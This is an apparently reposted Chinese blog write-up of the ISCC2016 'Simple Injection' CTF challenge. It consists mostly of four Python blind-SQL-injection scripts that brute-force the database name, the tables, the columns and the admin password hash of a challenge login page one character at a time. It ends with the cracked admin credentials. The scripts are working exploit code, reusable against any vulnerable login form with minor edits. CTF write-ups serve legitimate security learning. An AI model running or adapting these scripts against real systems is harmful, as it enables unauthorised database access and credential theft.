zoukankan html css js c++ java

sql盲注脚本(ISCC2016)Simple Injection

爆数据库

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation #数字+大小写字母
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr(database(),{0},1))={1}#"    #注入命令

st = 0
for i in range(1,50):  #i为库名长度
    st = 0
    for c in s :
        asc = ord(c)   #转为ASCII值
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :   #返回长度，可通过添加print(len(response.text))计算
            result += c
            print('database: ', result)
            st = 1
    if st == 0:
        break
print('database: ', result)

database=injection

爆表名

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('tables: ', result)
            st = 1
    if st == 0:
        break
print('tables: ', result)

tables: admin

爆列名

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='admin'),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('columns: ', result)
            st = 1
    if st == 0:
        break
print('columns: ', result)

columns: id,username,password

爆值

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation 
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('password: ', result)
            st = 1
    if st == 0:
        break
print('password: ', result)

password: 334cfb59c9d74849801d5acdcfdaadc3

MD5解密后得到的提交

username=admin&password=eTAloCrEP

查看全文

相关阅读:
获取所有栈的信息，只有最上面的和最下面的，但是不能获取栈中间的activity信息
 linux 接收udp流花屏的问题
 ffmpeg剪切视频
 Spring @RequestParam乱码问题
 ewebeditor ie8兼容问题
 [转] 只有十句话，我却看了十分钟，回味无穷
 [php]smtp.class.php
[asp]jmail发送邮件
 md5加密,常用的几个值(16位和32位)
JavaScript判断浏览器类型及版本

原文地址：https://www.cnblogs.com/NPFS/p/12837454.html